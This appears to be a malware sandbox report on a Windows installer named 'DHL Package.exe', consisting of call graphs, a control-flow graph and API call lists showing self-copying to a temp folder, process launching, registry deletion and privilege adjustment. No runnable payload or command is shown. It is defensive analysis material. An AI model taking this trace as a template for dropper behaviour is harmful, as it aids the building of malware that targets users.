4036d9 4753 403733 DeleteFileW 4752->4753 4754 4036dd GetWindowsDirectoryW lstrcatW 4752->4754 4831 403015 GetTickCount GetModuleFileNameW 4753->4831 4757 40345e 12 API calls 4754->4757 4755->4750 4758 4036f9 4757->4758 4758->4753 4759 4036fd GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4758->4759 4762 40345e 12 API calls 4759->4762 4760 403747 4761 4037fa 4760->4761 4765 4037ea 4760->4765 4769 405cdd CharNextW 4760->4769 4918 4039d0 4761->4918 4767 40372b 4762->4767 4915 4063db lstrcpynW 4763->4915 4764->4749 4859 403aaa 4765->4859 4767->4753 4767->4761 4786 403766 4769->4786 4772 403934 4775 4039b8 ExitProcess 4772->4775 4776 40393c GetCurrentProcess OpenProcessToken 4772->4776 4773 403814 4774 405a41 MessageBoxIndirectW 4773->4774 4778 403822 ExitProcess 4774->4778 4781 403954 LookupPrivilegeValueW AdjustTokenPrivileges 4776->4781 4782 403988 4776->4782 4779 4037c4 4783 405db8 18 API calls 4779->4783 4780 40382a 4784 4059ac 5 API calls 4780->4784 4781->4782 4785 4067d0 5 API calls 4782->4785 4787 4037d0 4783->4787 4788 40382f lstrcatW 4784->4788 4789 40398f 4785->4789 4786->4779 4786->4780 4787->4761 4916 4063db lstrcpynW 4787->4916 4790 403840 lstrcatW 4788->4790 4791 40384b lstrcatW lstrcmpiW 4788->4791 4792 4039a4 ExitWindowsEx 4789->4792 4795 4039b1 4789->4795 4790->4791 4791->4761 4794 403867 4791->4794 4792->4775 4792->4795 4797 403873 4794->4797 4798 40386c 4794->4798 4927 40140b 4795->4927 4796 4037df 4917 4063db lstrcpynW 4796->4917 4802 40598f 2 API calls 4797->4802 4801 405912 4 API calls 4798->4801 4803 403871 4801->4803 4804 403878 SetCurrentDirectoryW 4802->4804 4803->4804 4805 403893 4804->4805 4806 403888 4804->4806 4926 4063db lstrcpynW 4805->4926 4925 4063db lstrcpynW 4806->4925 4809 406418 17 API calls 4810 4038d2 DeleteFileW 4809->4810 4811 4038df CopyFileW 4810->4811 4816 4038a1 4810->4816 4811->4816 4812 403928 4813 4061a1 36 API calls 4812->4813 4813->4761 4814 4061a1 36 API calls 4814->4816 4815 406418 17 API calls 4815->4816 4816->4809 4816->4812 4816->4814 4816->4815 4817 4059c4 2 API calls 4816->4817 4818 403913 CloseHandle 4816->4818 4817->4816 4818->4816 4819->4744 4820->4746 4822 40668a 5 API calls 4821->4822 4824 40346a 4822->4824 4823 403474 4823->4752 4824->4823 4825 405cb0 3 API calls 4824->4825 4826 40347c 4825->4826 4827 40598f 2 API calls 4826->4827 4828 403482 4827->4828 4930 405f00 4828->4930 4934 405ed1 GetFileAttributesW CreateFileW 4831->4934 4833 403055 4834 403065 4833->4834 4935 4063db lstrcpynW 4833->4935 4834->4760 4836 40307b 4837 405cfc 2 API calls 4836->4837 4838 403081 4837->4838 4936 4063db lstrcpynW 4838->4936 4840 40308c GetFileSize 4841 4030a3 4840->4841 4856 403186 4840->4856 4841->4834 4844 403431 ReadFile 4841->4844 4847 4031f2 4841->4847 4855 402fb1 6 API calls 4841->4855 4841->4856 4843 40318f 4843->4834 4845 4031bf GlobalAlloc 4843->4845 4949 403447 SetFilePointer 4843->4949 4844->4841 4948 403447 SetFilePointer 4845->4948 4851 402fb1 6 API calls 4847->4851 4849 4031a8 4852 403431 ReadFile 4849->4852 4850 4031da 4853 40324c 35 API calls 4850->4853 4851->4834 4854 4031b3 4852->4854 4857 4031e6 4853->4857 4854->4834 4854->4845 4855->4841 4937 402fb1 4856->4937 4857->4834 4857->4857 4858 403223 SetFilePointer 4857->4858 4858->4834 4860 4067d0 5 API calls 4859->4860 4861 403abe 4860->4861 4862 403ad6 4861->4862 4864 403ac4 4861->4864 4863 4062a9 3 API calls 4862->4863 4865 403b06 4863->4865 4958 406322 wsprintfW 4864->4958 4867 403b25 lstrcatW 4865->4867 4869 4062a9 3 API calls 4865->4869 4868 403ad4 4867->4868 4950 403d80 4868->4950 4869->4867 4872 405db8 18 API calls 4873 403b57 4872->4873 4874 403beb 4873->4874 4876 4062a9 3 API calls 4873->4876 4875 405db8 18 API calls 4874->4875 4877 403bf1 4875->4877 4878 403b89 4876->4878 4879 403c01 LoadImageW 4877->4879 4880 406418 17 API calls 4877->4880 4878->4874 4883 403baa lstrlenW 4878->4883 4887 405cdd CharNextW 4878->4887 4881 403ca7 4879->4881 4882 403c28 RegisterClassW 4879->4882 4880->4879 4886 40140b 2 API calls 4881->4886 4884 403cb1 4882->4884 4885 403c5e SystemParametersInfoW CreateWindowExW 4882->4885 4888 403bb8 lstrcmpiW 4883->4888 4889 403bde 4883->4889 4884->4761 4885->4881 4890 403cad 4886->4890 4892 403ba7 4887->4892 4888->4889 4893 403bc8 GetFileAttributesW 4888->4893 4891 405cb0 3 API calls 4889->4891 4890->4884 4894 403d80 18 API calls 4890->4894 4895 403be4 4891->4895 4892->4883 4896 403bd4 4893->4896 4897 403cbe 4894->4897 4959 4063db lstrcpynW 4895->4959 4896->4889 4899 405cfc 2 API calls 4896->4899 4900 403cca ShowWindow 4897->4900 4901 403d4d 4897->4901 4899->4889 4903 406760 3 API calls 4900->4903 4902 405516 5 API calls 4901->4902 4904 403d53 4902->4904 4905 403ce2 4903->4905 4906 403d57 4904->4906 4907 403d6f 4904->4907 4908 403cf0 GetClassInfoW 4905->4908 4910 406760 3 API calls 4905->4910 4906->4884 4913 40140b 2 API calls 4906->4913 4909 40140b 2 API calls 4907->4909 4911 403d04 GetClassInfoW RegisterClassW 4908->4911 4912 403d1a DialogBoxParamW 4908->4912 4909->4884 4910->4908 4911->4912 4914 40140b 2 API calls 4912->4914 4913->4884 4914->4884 4915->4764 4916->4796 4917->4765 4919 4039e8 4918->4919 4920 4039da CloseHandle 4918->4920 4964 403a15 4919->4964 4920->4919 4923 405aed 67 API calls 4924 403803 OleUninitialize 4923->4924 4924->4772 4924->4773 4925->4805 4926->4816 4928 401389 2 API calls 4927->4928 4929 401420 4928->4929 4929->4775 4931 405f0d GetTickCount GetTempFileNameW 4930->4931 4932 40348d 4931->4932 4933 405f43 4931->4933 4932->4752 4933->4931 4933->4932 4934->4833 4935->4836 4936->4840 4938 402fd2 4937->4938 4939 402fba 4937->4939 4942 402fe2 GetTickCount 4938->4942 4943 402fda 4938->4943 4940 402fc3 DestroyWindow 4939->4940 4941 402fca 4939->4941 4940->4941 4941->4843 4944 402ff0 CreateDialogParamW ShowWindow 4942->4944 4945 403013 4942->4945 4946 40680c 2 API calls 4943->4946 4944->4945 4945->4843 4947 402fe0 4946->4947 4947->4843 4948->4850 4949->4849 4951 403d94 4950->4951 4960 406322 wsprintfW 4951->4960 4953 403e05 4961 403e39 4953->4961 4955 403b35 4955->4872 4956 403e0a 4956->4955 4957 406418 17 API calls 4956->4957 4957->4956 4958->4868 4959->4874 4960->4953 4962 406418 17 API calls 4961->4962 4963 403e47 SetWindowTextW 4962->4963 4963->4956 4965 403a23 4964->4965 4966 4039ed 4965->4966 4967 403a28 FreeLibrary GlobalFree 4965->4967 4966->4923 4967->4966 4967->4967 5690 40190f 5691 402d3e 17 API calls 5690->5691 5692 401916 5691->5692 5693 405a41 MessageBoxIndirectW 5692->5693 5694 40191f 5693->5694 5695 401491 5696 405443 24 API calls 5695->5696 5697 401498 5696->5697 5698 401f12 5699 402d3e 17 API calls 5698->5699 5700 401f18 5699->5700 5701 402d3e 17 API calls 5700->5701 5702 401f21 5701->5702 5703 402d3e 17 API calls 5702->5703 5704 401f2a 5703->5704 5705 402d3e 17 API calls 5704->5705 5706 401f33 5705->5706 5707 401423 24 API calls 5706->5707 5708 401f3a 5707->5708 5715 405a07 ShellExecuteExW 5708->5715 5710 401f82 5711 40687b 5 API calls 5710->5711 5712 402925 5710->5712 5713 401f9f CloseHandle 5711->5713 5713->5712 5715->5710 5716 402614 5717 402d3e 17 API calls 5716->5717 5718 40261b 5717->5718 5721 405ed1 GetFileAttributesW CreateFileW 5718->5721 5720 402627 5721->5720 5171 402596 5172 402d7e 17 API calls 5171->5172 5173 4025a0 5172->5173 5174 402d1c 17 API calls 5173->5174 5175 4025a9 5174->5175 5176 4025b8 5175->5176 5179 402925 5175->5179 5177 4025d1 RegEnumValueW 5176->5177 5178 4025c5 RegEnumKeyW 5176->5178 5180 4025ed RegCloseKey 5177->5180 5181 4025e6 5177->5181 5178->5180 5180->5179 5181->5180 5722 401d17 5723 402d1c 17 API calls 5722->5723 5724 401d1d IsWindow 5723->5724 5725 401a20 5724->5725 5265 401b9b 5266 401ba8 5265->5266 5267 401bec 5265->5267 5268 401c31 5266->5268 5275 401bbf 5266->5275 5269 401bf1 5267->5269 5270 401c16 GlobalAlloc 5267->5270 5272 406418 17 API calls 5268->5272 5278 402395 5268->5278 5269->5278 5286 4063db lstrcpynW 5269->5286 5271 406418 17 API calls 5270->5271 5271->5268 5274 40238f 5272->5274 5274->5278 5279 405a41 MessageBoxIndirectW 5274->5279 5284 4063db lstrcpynW 5275->5284 5276 401c03 GlobalFree 5276->5278 5279->5278 5280 401bce 5285 4063db lstrcpynW 5280->5285 5282 401bdd 5287 4063db lstrcpynW 5282->5287 5284->5280 5285->5282 5286->5276 5287->5278 5733 402b9d SendMessageW 5734 402bc2 5733->5734 5735 402bb7 InvalidateRect 5733->5735 5735->5734 5736 40149e 5737 402395 5736->5737 5738 4014ac PostQuitMessage 5736->5738 5738->5737 5739 404d9e GetDlgItem GetDlgItem 5740 404df2 7 API calls 5739->5740 5747 40501c 5739->5747 5741 404e9c DeleteObject 5740->5741 5742 404e8f SendMessageW 5740->5742 5743 404ea7 5741->5743 5742->5741 5745 404ede 5743->5745 5746 406418 17 API calls 5743->5746 5744 405104 5749 4051ad 5744->5749 5758 40515a SendMessageW 5744->5758 5782 40500f 5744->5782 5748 404331 18 API calls 5745->5748 5750 404ec0 SendMessageW SendMessageW 5746->5750 5747->5744 5780 40508e 5747->5780 5793 404cec SendMessageW 5747->5793 5753 404ef2 5748->5753 5751 4051c2 5749->5751 5752 4051b6 SendMessageW 5749->5752 5750->5743 5760 4051d4 ImageList_Destroy 5751->5760 5761 4051db 5751->5761 5777 4051eb 5751->5777 5752->5751 5757 404331 18 API calls 5753->5757 5754 4050f6 SendMessageW 5754->5744 5755 404398 8 API calls 5759 4053b0 5755->5759 5769 404f03 5757->5769 5763 40516f SendMessageW 5758->5763 5758->5782 5760->5761 5764 4051e4 GlobalFree 5761->5764 5761->5777 5762 405364 5767 405376 ShowWindow GetDlgItem ShowWindow 5762->5767 5762->5782 5766 405182 5763->5766 5764->5777 5765 404fde GetWindowLongW SetWindowLongW 5768 404ff7 5765->5768 5772 405193 SendMessageW 5766->5772 5767->5782 5770 405014 5768->5770 5771 404ffc ShowWindow 5768->5771 5769->5765 5773 404fd9 5769->5773 5776 404f56 SendMessageW 5769->5776 5778 404f94 SendMessageW 5769->5778 5779 404fa8 SendMessageW 5769->5779 5792 404366 SendMessageW 5770->5792 5791 404366 SendMessageW 5771->5791 5772->5749 5773->5765 5773->5768 5776->5769 5777->5762 5786 405226 5777->5786 5798 404d6c 5777->5798 5778->5769 5779->5769 5780->5744 5780->5754 5782->5755 5783 405330 5784 40533a InvalidateRect 5783->5784 5787 405346 5783->5787 5784->5787 5785 405254 SendMessageW 5789 40526a 5785->5789 5786->5785 5786->5789 5787->5762 5807 404ca7 5787->5807 5788 4052de SendMessageW SendMessageW 5788->5789 5789->5783 5789->5788 5791->5782 5792->5747 5794 404d4b SendMessageW 5793->5794 5795 404d0f GetMessagePos ScreenToClient SendMessageW 5793->5795 5796 404d43 5794->5796 5795->5796 5797 404d48 5795->5797 5796->5780 5797->5794 5810 4063db lstrcpynW 5798->5810 5800 404d7f 5811 406322 wsprintfW 5800->5811 5802 404d89 5803 40140b 2 API calls 5802->5803 5804 404d92 5803->5804 5812 4063db lstrcpynW 5804->5812 5806 404d99 5806->5786 5813 404bde 5807->5813 5809 404cbc 5809->5762 5810->5800 5811->5802 5812->5806 5814 404bf7 5813->5814 5815 406418 17 API calls 5814->5815 5816 404c5b 5815->5816 5817 406418 17 API calls 5816->5817 5818 404c66 5817->5818 5819 406418 17 API calls 5818->5819 5820 404c7c lstrlenW wsprintfW SetDlgItemTextW 5819->5820 5820->5809 5821 4044a1 lstrlenW 5822 4044c0 5821->5822 5823 4044c2 WideCharToMultiByte 5821->5823 5822->5823 5824 404822 5825 40484e 5824->5825 5826 40485f 5824->5826 5885 405a25 GetDlgItemTextW 5825->5885 5828 40486b GetDlgItem 5826->5828 5834 4048ca 5826->5834 5830 40487f 5828->5830 5829 404859 5832 40668a 5 API calls 5829->5832 5833 404893 SetWindowTextW 5830->5833 5840 405d5b 4 API calls 5830->5840 5831 4049ae 5883 404b5d 5831->5883 5887 405a25 GetDlgItemTextW 5831->5887 5832->5826 5836 404331 18 API calls 5833->5836 5834->5831 5837 406418 17 API calls 5834->5837 5834->5883 5841 4048af 5836->5841 5842 40493e SHBrowseForFolderW 5837->5842 5838 4049de 5843 405db8 18 API calls 5838->5843 5839 404398 8 API calls 5844 404b71 5839->5844 5845 404889 5840->5845 5846 404331 18 API calls 5841->5846 5842->5831 5847 404956 CoTaskMemFree 5842->5847 5848 4049e4 5843->5848 5845->5833 5851 405cb0 3 API calls 5845->5851 5849 4048bd 5846->5849 5850 405cb0 3 API calls 5847->5850 5888 4063db lstrcpynW 5848->5888 5886 404366 SendMessageW 5849->5886 5853 404963 5850->5853 5851->5833 5856 40499a SetDlgItemTextW 5853->5856 5860 406418 17 API calls 5853->5860 5855 4048c3 5858 4067d0 5 API calls 5855->5858 5856->5831 5857 4049fb 5859 4067d0 5 API calls 5857->5859 5858->5834 5871 404a02 5859->5871 5861 404982 lstrcmpiW 5860->5861 5861->5856 5864 404993 lstrcatW 5861->5864 5862 404a43 5889 4063db lstrcpynW 5862->5889 5864->5856 5865 404a4a 5866 405d5b 4 API calls 5865->5866 5867 404a50 GetDiskFreeSpaceW 5866->5867 5870 404a74 MulDiv 5867->5870 5872 404a9b 5867->5872 5869 405cfc 2 API calls 5869->5871 5870->5872 5871->5862 5871->5869 5871->5872 5873 404b0c 5872->5873 5874 404ca7 20 API calls 5872->5874 5875 404b2f 5873->5875 5877 40140b 2 API calls 5873->5877 5876 404af9 5874->5876 5890 404353 KiUserCallbackDispatcher 5875->5890 5879 404b0e SetDlgItemTextW 5876->5879 5880 404afe 5876->5880 5877->5875 5879->5873 5882 404bde 20 API calls 5880->5882 5881 404b4b 5881->5883 5884 40477b SendMessageW 5881->5884 5882->5873 5883->5839 5884->5883 5885->5829 5886->5855 5887->5838 5888->5857 5889->5865 5890->5881 5891 402522 5892 402d7e 17 API calls 5891->5892 5893 40252c 5892->5893 5894 402d3e 17 API calls 5893->5894 5895 402535 5894->5895 5896 402540 RegQueryValueExW 5895->5896 5900 402925 5895->5900 5897 402560 5896->5897 5898 402566 RegCloseKey 5896->5898 5897->5898 5902 406322 wsprintfW 5897->5902 5898->5900 5902->5898 5903 4021a2 5904 402d3e 17 API calls 5903->5904 5905 4021a9 5904->5905 5906 402d3e 17 API calls 5905->5906 5907 4021b3 5906->5907 5908 402d3e 17 API calls 5907->5908 5909 4021bd 5908->5909 5910 402d3e 17 API calls 5909->5910 5911 4021c7 5910->5911 5912 402d3e 17 API calls 5911->5912 5914 4021d1 5912->5914 5913 402210 CoCreateInstance 5918 40222f 5913->5918 5914->5913 5915 402d3e 17 API calls 5914->5915 5915->5913 5916 401423 24 API calls 5917 4022ee 5916->5917 5918->5916 5918->5917 4572 4015a3 4573 402d3e 17 API calls 4572->4573 4574 4015aa SetFileAttributesW 4573->4574 4575 4015bc 4574->4575 4600 401fa4 4601 402d3e 17 API calls 4600->4601 4602 401faa 4601->4602 4603 405443 24 API calls 4602->4603 4604 401fb4 4603->4604 4615 4059c4 CreateProcessW 4604->4615 4607 401fdd CloseHandle 4611 402925 4607->4611 4610 401fcf 4612 401fd4 4610->4612 4613 401fdf 4610->4613 4623 406322 wsprintfW 4612->4623 4613->4607 4616 401fba 4615->4616 4617 4059f7 CloseHandle 4615->4617 4616->4607 4616->4611 4618 40687b WaitForSingleObject 4616->4618 4617->4616 4619 406895 4618->4619 4620 4068a7 GetExitCodeProcess 4619->4620 4624 40680c 4619->4624 4620->4610 4623->4607 4625 406829 PeekMessageW 4624->4625 4626 406839 WaitForSingleObject 4625->4626 4627 40681f DispatchMessageW 4625->4627 4626->4619 4627->4625 4637 4023aa 4638 4023b2 4637->4638 4643 4023b8 4637->4643 4639 402d3e 17 API calls 4638->4639 4639->4643 4640 402d3e 17 API calls 4642 4023c6 4640->4642 4641 4023d4 4645 402d3e 17 API calls 4641->4645 4642->4641 4644 402d3e 17 API calls 4642->4644 4643->4640 4643->4642 4644->4641 4646 4023dd WritePrivateProfileStringW 4645->4646 5919 40202a 5920 402d3e 17 API calls 5919->5920 5921 402031 5920->5921 5922 4067d0 5 API calls 5921->5922 5923 402040 5922->5923 5924 40205c GlobalAlloc 5923->5924 5925 4020c4 5923->5925 5924->5925 5926 402070 5924->5926 5927 4067d0 5 API calls 5926->5927 5928 402077 5927->5928 5929 4067d0 5 API calls 5928->5929 5930 402081 5929->5930 5930->5925 5934 406322 wsprintfW 5930->5934 5932 4020b6 5935 406322 wsprintfW 5932->5935 5934->5932 5935->5925 5936 402f2b 5937 402f56 5936->5937 5938 402f3d SetTimer 5936->5938 5939 402fab 5937->5939 5940 402f70 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5937->5940 5938->5937 5940->5939 4647 40242c 4648 402434 4647->4648 4649 40245f 4647->4649 4659 402d7e 4648->4659 4650 402d3e 17 API calls 4649->4650 4652 402466 4650->4652 4664 402dfc 4652->4664 4654 402445 4656 402d3e 17 API calls 4654->4656 4657 40244c RegDeleteValueW RegCloseKey 4656->4657 4658 402473 4657->4658 4660 402d3e 17 API calls 4659->4660 4661 402d95 4660->4661 4662 406248 RegOpenKeyExW 4661->4662 4663 40243b 4662->4663 4663->4654 4663->4658 4665 402e10 4664->4665 4666 402e09 4664->4666 4665->4666 4668 402e41 4665->4668 4666->4658 4669 406248 RegOpenKeyExW 4668->4669 4670 402e6f 4669->4670 4671 402f24 4670->4671 4672 402e79 4670->4672 4671->4666 4673 402e7f RegEnumValueW 4672->4673 4677 402ea2 4672->4677 4674 402f09 RegCloseKey 4673->4674 4673->4677 4674->4671 4675 402ede RegEnumKeyW 4676 402ee7 RegCloseKey 4675->4676 4675->4677 4678 4067d0 5 API calls 4676->4678 4677->4674 4677->4675 4677->4676 4679 402e41 6 API calls 4677->4679 4680 402ef7 4678->4680 4679->4677 4681 402f19 4680->4681 4682 402efb RegDeleteKeyW 4680->4682 4681->4671 4682->4671 5941 6ca72349 5942 6ca723b3 5941->5942 5943 6ca723be GlobalAlloc 5942->5943 5944 6ca723dd 5942->5944 5943->5942 5952 401a30 5953 402d3e 17 API calls 5952->5953 5954 401a39 ExpandEnvironmentStringsW 5953->5954 5955 401a4d 5954->5955 5957 401a60 5954->5957 5956 401a52 lstrcmpW 5955->5956 5955->5957 5956->5957 5970 6ca716d4 5971 6ca71703 5970->5971 5972 6ca71b5f 22 API calls 5971->5972 5973 6ca7170a 5972->5973 5974 6ca71711 5973->5974 5975 6ca7171d 5973->5975 5976 6ca71272 2 API calls 5974->5976 5977 6ca71727 5975->5977 5978 6ca71744 5975->5978 5981 6ca7171b 5976->5981 5982 6ca7153d 3 API calls 5977->5982 5979 6ca7176e 5978->5979 5980 6ca7174a 5978->5980 5984 6ca7153d 3 API calls 5979->5984 5983 6ca715b4 3 API calls 5980->5983 5985 6ca7172c 5982->5985 5987 6ca7174f 5983->5987 5984->5981 5986 6ca715b4 3 API calls 5985->5986 5988 6ca71732 5986->5988 5989 6ca71272 2 API calls 5987->5989 5990 6ca71272 2 API calls 5988->5990 5991 6ca71755 GlobalFree 5989->5991 5992 6ca71738 GlobalFree 5990->5992 5991->5981 5993 6ca71769 GlobalFree 5991->5993 5992->5981 5993->5981 5167 401735 5168 402d3e 17 API calls 5167->5168 5169 40173c SearchPathW 5168->5169 5170 401757 5169->5170 5994 402636 5995 402665 5994->5995 5996 40264a 5994->5996 5998 402695 5995->5998 5999 40266a 5995->5999 5997 402d1c 17 API calls 5996->5997 6007 402651 5997->6007 6000 402d3e 17 API calls 5998->6000 6001 402d3e 17 API calls 5999->6001 6003 40269c lstrlenW 6000->6003 6002 402671 6001->6002 6011 4063fd WideCharToMultiByte 6002->6011 6003->6007 6005 402685 lstrlenA 6005->6007 6006 4026df 6007->6006 6009 405fb2 5 API calls 6007->6009 6010 4026c9 6007->6010 6008 405f83 WriteFile 6008->6006 6009->6010 6010->6006 6010->6008 6011->6005 6019 4053b7 6020 4053c7 6019->6020 6021 4053db 6019->6021 6022 4053cd 6020->6022 6031 405424 6020->6031 6023 4053e3 IsWindowVisible 6021->6023 6029 4053fa 6021->6029 6025 40437d SendMessageW 6022->6025 6026 4053f0 6023->6026 6023->6031 6024 405429 CallWindowProcW 6027 4053d7 6024->6027 6025->6027 6028 404cec 5 API calls 6026->6028 6028->6029 6029->6024 6030 404d6c 4 API calls 6029->6030 6030->6031 6031->6024 5262 6ca729df 5263 6ca72a2f 5262->5263 5264 6ca729ef VirtualProtect 5262->5264 5264->5263 6032 401d38 6033 402d1c 17 API calls 6032->6033 6034 401d3f 6033->6034 6035 402d1c 17 API calls 6034->6035 6036 401d4b GetDlgItem 6035->6036 6037 402630 6036->6037 6038 4014b8 6039 4014be 6038->6039 6040 401389 2 API calls 6039->6040 6041 4014c6 6040->6041 6042 4028bb 6043 4028c1 6042->6043 6044 402bc2 6043->6044 6045 4028c9 FindClose 6043->6045 6045->6044 6046 6ca718d9 6048 6ca718fc 6046->6048 6047 6ca71943 6050 6ca71272 2 API calls 6047->6050 6048->6047 6049 6ca71931 GlobalFree 6048->6049 6049->6047 6051 6ca71ace GlobalFree GlobalFree 6050->6051 6052 6ca71058 6053 6ca71074 6052->6053 6054 6ca710dd 6053->6054 6055 6ca71516 GlobalFree 6053->6055 6057 6ca71092 6053->6057 6055->6057 6056 6ca71516 GlobalFree 6058 6ca710a2 6056->6058 6057->6056 6059 6ca710b2 6058->6059 6060 6ca710a9 GlobalSize 6058->6060 6061 6ca710b6 GlobalAlloc 6059->6061 6062 6ca710c7 6059->6062 6060->6059 6063 6ca7153d 3 API calls 6061->6063 6064 6ca710d2 GlobalFree 6062->6064 6063->6062 6064->6054

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 40348f-4034cc SetErrorMode GetVersion 1 4034ce-4034d6 call 4067d0 0->1 2 4034df 0->2 1->2 7 4034d8 1->7 4 4034e4-4034f8 call 406760 lstrlenA 2->4 9 4034fa-403516 call 4067d0 * 3 4->9 7->2 16 403527-403586 #17 OleInitialize SHGetFileInfoW call 4063db GetCommandLineW call 4063db 9->16 17 403518-40351e 9->17 24 403590-4035aa call 405cdd CharNextW 16->24 25 403588-40358f 16->25 17->16 21 403520 17->21 21->16 28 4035b0-4035b6 24->28 29 4036c1-4036db GetTempPathW call 40345e 24->29 25->24 30 4035b8-4035bd 28->30 31 4035bf-4035c3 28->31 38 403733-40374d DeleteFileW call 403015 29->38 39 4036dd-4036fb GetWindowsDirectoryW lstrcatW call 40345e 29->39 30->30 30->31 33 4035c5-4035c9 31->33 34 4035ca-4035ce 31->34 33->34 36 4035d4-4035da 34->36 37 40368d-40369a call 405cdd 34->37 42 4035f5-40362e 36->42 43 4035dc-4035e4 36->43 54 40369c-40369d 37->54 55 40369e-4036a4 37->55 56 403753-403759 38->56 57 4037fe-40380e call 4039d0 OleUninitialize 38->57 39->38 52 4036fd-40372d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40345e 39->52 50 403630-403635 42->50 51 40364b-403685 42->51 48 4035e6-4035e9 43->48 49 4035eb 43->49 48->42 48->49 49->42 50->51 58 403637-40363f 50->58 51->37 53 403687-40368b 51->53 52->38 52->57 53->37 60 4036ac-4036ba call 4063db 53->60 54->55 55->28 61 4036aa 55->61 62 4037ee-4037f5 call 403aaa 56->62 63 40375f-40376a call 405cdd 56->63 75 403934-40393a 57->75 76 403814-403824 call 405a41 ExitProcess 57->76 65 403641-403644 58->65 66 403646 58->66 68 4036bf 60->68 61->68 74 4037fa 62->74 80 4037b8-4037c2 63->80 81 40376c-4037a1 63->81 65->51 65->66 66->51 68->29 74->57 78 4039b8-4039c0 75->78 79 40393c-403952 GetCurrentProcess OpenProcessToken 75->79 82 4039c2 78->82 83 4039c6-4039ca ExitProcess 78->83 87 403954-403982 LookupPrivilegeValueW AdjustTokenPrivileges 79->87 88 403988-403996 call 4067d0 79->88 85 4037c4-4037d2 call 405db8 80->85 86 40382a-40383e call 4059ac lstrcatW 80->86 89 4037a3-4037a7 81->89 82->83 85->57 99 4037d4-4037ea call 4063db * 2 85->99 100 403840-403846 lstrcatW 86->100 101 40384b-403865 lstrcatW lstrcmpiW 86->101 87->88 102 4039a4-4039af ExitWindowsEx 88->102 103 403998-4039a2 88->103 93 4037b0-4037b4 89->93 94 4037a9-4037ae 89->94 93->89 98 4037b6 93->98 94->93 94->98 98->80 99->62 100->101 101->57 105 403867-40386a 101->105 102->78 106 4039b1-4039b3 call 40140b 102->106 103->102 103->106 108 403873 call 40598f 105->108 109 40386c-403871 call 405912 105->109 106->78 117 403878-403886 SetCurrentDirectoryW 108->117 109->117 118 403893-4038bc call 4063db 117->118 119 403888-40388e call 4063db 117->119 123 4038c1-4038dd call 406418 DeleteFileW 118->123 119->118 126 40391e-403926 123->126 127 4038df-4038ef CopyFileW 123->127 126->123 128 403928-40392f call 4061a1 126->128 127->126 129 4038f1-403911 call 4061a1 call 406418 call 4059c4 127->129 128->57 129->126 138 403913-40391a CloseHandle 129->138 138->126
                                                                                                APIs
                                                                                                • SetErrorMode.KERNELBASE ref: 004034B2
                                                                                                • GetVersion.KERNEL32 ref: 004034B8
                                                                                                • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004034EB
                                                                                                • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403528
                                                                                                • OleInitialize.OLE32(00000000), ref: 0040352F
                                                                                                • SHGetFileInfoW.SHELL32(004216C8,00000000,?,000002B4,00000000), ref: 0040354B
                                                                                                • GetCommandLineW.KERNEL32(00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 00403560
                                                                                                • CharNextW.USER32(00000000,"C:\Users\user\Desktop\DHL Package.exe",00000020,"C:\Users\user\Desktop\DHL Package.exe",00000000,?,00000007,00000009,0000000B), ref: 00403598
                                                                                                  • Part of subcall function 004067D0: GetModuleHandleA.KERNEL32(?,00000020,?,00403501,0000000B), ref: 004067E2
                                                                                                  • Part of subcall function 004067D0: GetProcAddress.KERNEL32(00000000,?), ref: 004067FD
                                                                                                • GetTempPathW.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004036D2
                                                                                                • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 004036E3
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004036EF
                                                                                                • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403703
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 0040370B
                                                                                                • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040371C
                                                                                                • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403724
                                                                                                • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403738
                                                                                                  • Part of subcall function 004063DB: lstrcpynW.KERNEL32(?,?,00000400,00403560,00429220,NSIS Error,?,00000007,00000009,0000000B), ref: 004063E8
                                                                                                • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403803
                                                                                                • ExitProcess.KERNEL32 ref: 00403824
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403837
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403846
                                                                                                • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403851
                                                                                                • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\DHL Package.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 0040385D
                                                                                                • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403879
                                                                                                • DeleteFileW.KERNEL32(00420EC8,00420EC8,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 004038D3
                                                                                                • CopyFileW.KERNEL32(C:\Users\user\Desktop\DHL Package.exe,00420EC8,00000001,?,00000007,00000009,0000000B), ref: 004038E7
                                                                                                • CloseHandle.KERNEL32(00000000,00420EC8,00420EC8,?,00420EC8,00000000,?,00000007,00000009,0000000B), ref: 00403914
                                                                                                • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403943
                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0040394A
